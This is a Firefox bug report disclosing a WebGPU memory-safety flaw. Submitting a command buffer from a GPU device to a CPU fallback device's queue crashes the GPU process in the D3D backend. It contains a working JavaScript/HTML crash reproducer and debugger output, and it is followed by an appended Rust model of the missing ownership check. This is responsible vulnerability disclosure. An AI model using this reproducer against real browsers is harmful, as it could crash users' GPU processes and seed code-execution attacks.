Bug 1856765 Comment 0 Edit History

VULNERABILITY DETAILS
	A specially crafted HTML file can trigger an out-of-bounds memory access in execute_command_lists in the D3D backend. This bug has the potential to be exploited to execute arbitrary code in the GPU process.
	
	An adapter of device type gpu (wgpu_types::DeviceType IntegratedGpu or DiscreteGpu) is requested, then a command encoder and a command buffer are created with this device by the following JavaScript code:

	navigator.gpu.requestAdapter().then((adapter0)=>{
		adapter0.requestDevice().then((device0)=>{ 
			cmdEncoder0 = device0.createCommandEncoder(); 
			gpuTexture0 = device0.createTexture({ size: {width:276,depthOrArrayLayers:0}, format:"bc3-rgba-unorm", usage: 4});
			cmdBuffer0 = cmdEncoder0.finish();
		});
	});
	
	
	By adding a "{forceFallbackAdapter:true}" parameter to the JS function navigator.gpu.requestAdapter(), an adapter of device type cpu (wgpu_types::DeviceType Cpu) can be requested.
	
	The following Rust code in instance.rs filters out the gpu adapters and retains only the adapter of type cpu:

		pub fn request_adapter(...)
		...
							if force_software {
								adapters.retain(|exposed| exposed.info.device_type == wgt::DeviceType::Cpu);
							}
		...
		third_party/rust/wgpu-core/src/instance.rs

	Then, the command buffer created previously with the gpu device can be submitted to the D3D command queue of the cpu device:
	
	navigator.gpu.requestAdapter({forceFallbackAdapter:true}).then((adapter1)=>{
		adapter1.requestDevice().then((device1)=>{ 
			device1.queue.submit([cmdBuffer0]);
		});
	});

	Somehow, the D3D DLL does not check or handle this cross-device submission properly. The GPU process of Firefox crashes:
	
		(5c08.514): Access violation - code c0000005 (!!! second chance !!!)
		d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0:
		00007ff9`fbd183f0 8b4708          mov     eax,dword ptr [rdi+8] ds:000000d2`00000008=????????
	
	On a locally built Firefox debug build, I sometimes got this exception in the same function d3d10warp.dll!UMCommandQueue::ExecuteCommandList when running the same PoC test case:
	
		Unhandled exception at 0x00007FF9FBD19717 (d3d10warp.dll) in firefox.exe: RangeChecks instrumentation code detected an out of range array access.

	It seems to be an out-of-bounds array access.
	
	On some occasions with the same test case, I got the following exception instead:

		Unhandled exception at 0x00007FFBD90A9717 (d3d10warp.dll) in firefox.exe: An out of range switch jumptable entry was invoked.

	It looks like the bug can corrupt some structural data and change the course of code execution. From this point of view, it may be possible to exploit the bug to execute arbitrary code in the GPU process.
	
	
VERSION
	Firefox:	120.0a1 (2023-09-30) (64-bit)
	OS:	Windows 11 Home 22H2 (Build 22621.2283)


REPRODUCTION CASE  (.)
	<script>
	navigator.gpu.requestAdapter().then((adapter0)=>{
		adapter0.requestDevice().then((device0)=>{ 
			cmdEncoder0 = device0.createCommandEncoder(); 
			gpuTexture0 = device0.createTexture({ size: {width:276,depthOrArrayLayers:0}, format:"bc3-rgba-unorm", usage: 4});
			cmdBuffer0 = cmdEncoder0.finish();
		});
	});

	navigator.gpu.requestAdapter({forceFallbackAdapter:true}).then((adapter1)=>{
		adapter1.requestDevice().then((device1)=>{ 
			device1.queue.submit([cmdBuffer0]);
		});
	});
	</script>

    

Type of crash: gpu process

Crash State: 


	(5c08.514): Access violation - code c0000005 (!!! second chance !!!)
	d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0:
	00007ff9`fbd183f0 8b4708          mov     eax,dword ptr [rdi+8] ds:000000d2`00000008=????????
	0:099> r
	rax=00000000000001fd rbx=0000000000000000 rcx=000001fd54d29e00
	rdx=0000000000000000 rsi=000001fd54d29ed0 rdi=000000d200000000
	rip=00007ff9fbd183f0 rsp=000000d2b640bac0 rbp=000000d2b640bbc0
	 r8=00007ff9fbc40000  r9=0000000000000000 r10=0000000000000003
	r11=000000d2b640b0d0 r12=0000000000000000 r13=0000000000000000
	r14=0000000000000000 r15=000001fd54bddfa0
	iopl=0         nv up ei pl nz na po nc
	cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010204
	d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0:
	00007ff9`fbd183f0 8b4708          mov     eax,dword ptr [rdi+8] ds:000000d2`00000008=????????
	0:099> dv
	Unable to enumerate locals, Win32 error 0n87
	Private symbols (symbols.pri) are required for locals.
	Type ".hh dbgerr005" for details.
	0:099> k
	 # Child-SP          RetAddr           Call Site
	00 000000d2`b640bac0 00007ff9`fbd180db d3d10warp!UMCommandQueue::ExecuteCommandList+0x2e0
	01 000000d2`b640bd60 00007ff9`c6cd5b81 d3d10warp!UMCommandQueue::ExecuteCommandLists+0x5b
	02 000000d2`b640bd90 00007ff9`c6cd548c D3D12Core!CCommandQueue<0>::ExecuteCommandListsImpl+0x611
	03 000000d2`b640be80 00007ff9`78ee1469 D3D12Core!CCommandQueue<0>::ExecuteCommandLists+0x3c
	04 000000d2`b640bec0 00007ff9`78e41ac7 xul!d3d12::com::ComPtr<winapi::um::d3d12::ID3D12CommandQueue>::execute_command_lists+0x79 [/builds/worker/checkouts/gecko/third_party/rust/d3d12/src/queue.rs @ 25] 
	05 000000d2`b640bf20 00007ff9`788c721c xul!wgpu_hal::dx12::impl$42::submit+0xd7 [/builds/worker/checkouts/gecko/third_party/rust/wgpu-hal/src/dx12/mod.rs @ 843] 
	06 000000d2`b640bf90 00007ff9`78972429 xul!wgpu_core::global::Global<wgpu_bindings::identity::IdentityRecyclerFactory>::queue_submit<wgpu_bindings::identity::IdentityRecyclerFactory,wgpu_hal::dx12::Api>+0x8ec [/builds/worker/checkouts/gecko/third_party/rust/wgpu-core/src/device/queue.rs @ 1369] 
	07 000000d2`b640eb20 00007ff9`76d2cb8d xul!wgpu_bindings::server::wgpu_server_queue_submit+0x69 [/builds/worker/checkouts/gecko/gfx/wgpu_bindings/src/server.rs @ 923] 
	08 000000d2`b640ec50 00007ff9`76d2a703 xul!mozilla::webgpu::WebGPUParent::RecvQueueSubmit+0x8d [/builds/worker/checkouts/gecko/dom/webgpu/ipc/WebGPUParent.cpp @ 700] 
	09 000000d2`b640ef00 00007ff9`74183d9b xul!mozilla::webgpu::PWebGPUParent::OnMessageReceived+0x2e43 [/builds/worker/workspace/obj-build/ipc/ipdl/PWebGPUParent.cpp @ 1512] 
	0a 000000d2`b640f100 00007ff9`752d5dd9 xul!mozilla::gfx::PCanvasManagerParent::OnMessageReceived+0x1bb [/builds/worker/workspace/obj-build/ipc/ipdl/PCanvasManagerParent.cpp @ 269] 
	0b (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::DispatchAsyncMessage+0x81 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1800] 
	0c (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::DispatchMessage+0x365 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1725] 
	0d 000000d2`b640f1a0 00007ff9`73672100 xul!mozilla::ipc::MessageChannel::RunMessage+0x469 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1525] 
	0e 000000d2`b640f510 00007ff9`74faffa4 xul!mozilla::ipc::MessageChannel::MessageTask::Run+0x80 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1632] 
	0f 000000d2`b640f560 00007ff9`74fae25f xul!nsThread::ProcessNextEvent+0x19c4 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1193] 
	10 (Inline Function) --------`-------- xul!NS_ProcessNextEvent+0x29 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 480] 
	11 000000d2`b640fa30 00007ff9`73fa8d0f xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0x29f [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 330] 
	12 (Inline Function) --------`-------- xul!MessageLoop::RunInternal+0x16 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 370] 
	13 000000d2`b640fae0 00007ff9`73dcea1f xul!MessageLoop::RunHandler+0x2f [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 364] 
	14 (Inline Function) --------`-------- xul!MessageLoop::Run+0x43 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 345] 
	15 000000d2`b640fb30 00007ff9`c6e342d5 xul!nsThread::ThreadFunc+0x19f [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 370] 
	16 000000d2`b640fd10 00007ff9`c6eb8ee1 nss3!_PR_NativeRunThread+0x145 [/builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c @ 421] 
	17 000000d2`b640fd90 00007ffa`04629363 nss3!pr_root+0x11 [/builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c @ 140] 
	18 000000d2`b640fdc0 00007ffa`057d257d ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
	19 000000d2`b640fdf0 00007ff9`ea54bce8 KERNEL32!BaseThreadInitThunk+0x1d
	1a (Inline Function) --------`-------- mozglue!mozilla::interceptor::FuncHook<mozilla::interceptor::WindowsDllInterceptor<mozilla::interceptor::VMSharingPolicyShared>,void (*)(int, void *, void *)>::operator()+0x15 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/nsWindowsDllInterceptor.h @ 150] 
	1b 000000d2`b640fe20 00007ffa`069eaa68 mozglue!patched_BaseThreadInitThunk+0x28 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp @ 561] 
	1c 000000d2`b640fe90 00000000`00000000 ntdll!RtlUserThreadStart+0x28


	
CREDIT INFORMATION
Reporter credit: Looben Yang
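As an added illustration of the check the report says is missing on the submit path (this is not code from the report or from wgpu; the DeviceId, Device, CommandBuffer, Queue and SubmitError types are assumptions made for this model): every command buffer in a batch is verified to belong to the queue's device before anything is forwarded to the backend, so a batch containing a buffer recorded on another device executes nothing.

```rust
// Added example, not code from the bug report or from wgpu: a minimal model of
// the ownership validation the submit path needs before command lists reach the
// D3D backend. All types here are assumptions, not wgpu-core's real types.

#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub enum DeviceType {
    IntegratedGpu,
    DiscreteGpu,
    Cpu, // the fallback adapter requested with forceFallbackAdapter:true
}

#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub struct DeviceId(pub u32);

#[derive(Debug)]
pub struct Device {
    pub id: DeviceId,
    pub device_type: DeviceType,
}

/// A finished command buffer records which device's encoder produced it.
#[derive(Debug)]
pub struct CommandBuffer {
    pub device: DeviceId,
    pub command_count: usize,
}

#[derive(Debug, PartialEq, Eq)]
pub enum SubmitError {
    /// The command buffer was recorded on a different device than the queue.
    WrongDevice { queue: DeviceId, buffer: DeviceId },
}

pub struct Queue {
    pub device: DeviceId,
    /// Stands in for the backend command queue; the real one executes the lists.
    executed: Vec<usize>,
}

impl Queue {
    pub fn new(device: &Device) -> Self {
        Queue { device: device.id, executed: Vec::new() }
    }

    /// Hands every list to the backend without checking ownership: this is the
    /// situation the report describes reaching d3d10warp.
    pub fn submit_unchecked(&mut self, buffers: &[&CommandBuffer]) -> usize {
        self.executed.extend(buffers.iter().map(|b| b.command_count));
        buffers.len()
    }

    /// Validates the whole batch first, so a batch with one foreign buffer
    /// executes nothing, then forwards it to the backend.
    pub fn submit(&mut self, buffers: &[&CommandBuffer]) -> Result<usize, SubmitError> {
        for b in buffers {
            if b.device != self.device {
                return Err(SubmitError::WrongDevice { queue: self.device, buffer: b.device });
            }
        }
        Ok(self.submit_unchecked(buffers))
    }
}

/// Models cmdEncoder.finish(): the buffer is tagged with the creating device.
pub fn finish(device: &Device, command_count: usize) -> CommandBuffer {
    CommandBuffer { device: device.id, command_count }
}

/// Replays the report's scenario: cmdBuffer0 is recorded on the gpu device and
/// then submitted to the cpu (fallback) device's queue. Returns the checked
/// result and how many lists the backend actually executed.
pub fn cross_device_scenario() -> (Result<usize, SubmitError>, usize) {
    let gpu = Device { id: DeviceId(0), device_type: DeviceType::DiscreteGpu };
    let cpu = Device { id: DeviceId(1), device_type: DeviceType::Cpu };
    let cmd_buffer0 = finish(&gpu, 0);
    let mut cpu_queue = Queue::new(&cpu);
    let result = cpu_queue.submit(&[&cmd_buffer0]);
    (result, cpu_queue.executed.len())
}
```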